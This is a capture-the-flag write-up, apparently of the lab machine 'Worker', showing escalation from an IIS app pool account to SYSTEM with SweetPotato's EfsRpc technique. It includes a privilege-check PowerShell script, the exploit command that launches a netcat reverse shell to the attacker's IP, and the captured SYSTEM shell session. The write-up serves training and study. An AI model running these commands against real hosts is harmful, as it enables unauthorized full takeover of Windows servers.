SweetPotato


The compromised IIS APPPOOL\DefaultAppPool account holds both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege. Either one is enough to turn an impersonated SYSTEM token into a SYSTEM process (CreateProcessWithTokenW for the former, CreateProcessAsUser for the latter), which is exactly what the "potato" family of exploits does, so the target is a candidate for them.

I would usually use JuicyPotato for token impersonation, but its DCOM/OXID trick was broken by Microsoft starting with Windows 10 1809 and Windows Server 2019. The target is Windows Server 2019, so I will be using an alternative: SweetPotato.

SweetPotato is a collection of native Windows privilege escalation techniques from service accounts to SYSTEM. It was created by @_EthicalChaos_ and includes:

  •     RottenPotato
  •     Weaponized JuicyPotato with BITS WinRM discovery
  •     PrintSpoofer discovery and original exploit
  •     EfsRpc built on EfsPotato
  •     PetitPotam
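The two facts that drove the choice above, which privileges the token holds and which OS build the target runs, can be checked in one go before dropping any binary. The script below is an added example, not code from the original writeup or from SweetPotato: it parses `whoami /priv` for the two privileges, reads the build number, and says which technique family still applies. The 17763 threshold (Windows 10 1809 / Server 2019) and the wording of the recommendations are this example's own assumptions.

```powershell
# Added example (not from the original writeup or from SweetPotato): a
# pre-flight check for potato-style escalation. It parses `whoami /priv` for the
# two privileges named in the text and uses the OS build number to decide which
# technique family still applies. The 17763 threshold (Windows 10 1809 / Server
# 2019, where Microsoft broke JuicyPotato's DCOM/OXID trick) and the wording of
# the recommendations are this example's own assumptions.

function Get-TokenPrivileges {
    param(
        # Lines of `whoami /priv` output; taken as a parameter so output
        # captured from another host can be fed in as well.
        [Parameter(Mandatory)][string[]]$WhoamiPrivOutput
    )
    $privs = @{}
    foreach ($line in $WhoamiPrivOutput) {
        # Data rows look like:
        # SeImpersonatePrivilege  Impersonate a client after authentication  Enabled
        if ($line -match '^(Se\w+Privilege)\s+.+\s+(Enabled|Disabled)\s*$') {
            $privs[$Matches[1]] = ($Matches[2] -eq 'Enabled')
        }
    }
    return $privs
}

function Get-PotatoRecommendation {
    param(
        [Parameter(Mandatory)][hashtable]$Privileges,
        [Parameter(Mandatory)][int]$BuildNumber
    )
    # Presence is what matters: a privilege listed as Disabled is still held by
    # the token, and a process can enable a privilege it holds before impersonating.
    $impersonate = $Privileges.ContainsKey('SeImpersonatePrivilege')
    $assign      = $Privileges.ContainsKey('SeAssignPrimaryTokenPrivilege')
    if (-not ($impersonate -or $assign)) {
        return 'No SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege: potato techniques do not apply.'
    }
    if ($BuildNumber -lt 17763) {
        return "Build $BuildNumber is older than 1809/2019: JuicyPotato (DCOM/OXID) is still an option."
    }
    return "Build $BuildNumber is 1809/2019 or newer: JuicyPotato is patched here, use SweetPotato -e PrintSpoofer or -e EfsRpc."
}

# Live run in the current session (on Worker this is the IIS app pool account).
$privs = Get-TokenPrivileges -WhoamiPrivOutput (whoami /priv)
$build = [int](Get-CimInstance Win32_OperatingSystem).BuildNumber
"User:       $(whoami)"
"Privileges: $(($privs.Keys | Sort-Object) -join ', ')"
Get-PotatoRecommendation -Privileges $privs -BuildNumber $build
```

Of the two SweetPotato methods recommended for newer builds, PrintSpoofer additionally needs the Print Spooler service to be running, while EfsRpc only needs the EFS RPC interface that lsass exposes, which is one reason to reach for EfsRpc first.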

Exploit


The compiled exploit binary is available online, so I staged it on the target over SMB from my attacking machine:

PS C:\tmp> copy \\10.10.16.8\smb\potato\SweetPotato.exe .

Delivery complete

Exploitation


PS C:\tmp> cmd /c C:\tmp\SweetPotato.exe -p "C:\tmp\nc64.exe" -e EfsRpc -a "10.10.16.8 1235 -e powershell"
SweetPotato by @_EthicalChaos_
  Orignal RottenPotato code and exploit by @foxglovesec
  Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
  PrintSpoofer discovery and original exploit by @itm4n
  EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] Attempting NP impersonation using method EfsRpc to launch C:\tmp\nc64.exe
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/325b0bde-18b2-4b9d-960b-03c614e69956/\325b0bde-18b2-4b9d-960b-03c614e69956\325b0bde-18b2-4b9d-960b-03c614e69956
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

The command above uses the EfsRpc method. It calls the MS-EFSR EfsRpcOpenFileRaw function with a UNC path pointing at a named pipe that SweetPotato itself serves; the EFS service, running as SYSTEM, connects to that pipe, and the pipe server uses SeImpersonatePrivilege to impersonate the client and duplicate its SYSTEM token for process creation. Because the whole coercion happens over a local pipe (\\localhost\pipe\...), no listening TCP port and no tunneling through the host firewall is needed; the only network connection is the nc64.exe reverse shell that SweetPotato launches as SYSTEM.

┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ nnc 1235  
listening on [any] 1235 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.203] 51061
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> hostname
hostname
Worker
PS C:\Windows\system32> ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::248
   IPv6 Address. . . . . . . . . . . : dead:beef::1cb0:fbca:343f:d725
   Link-local IPv6 Address . . . . . : fe80::1cb0:fbca:343f:d725%4
   IPv4 Address. . . . . . . . . . . : 10.10.10.203
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%4
                                       10.10.10.2

System Level Compromise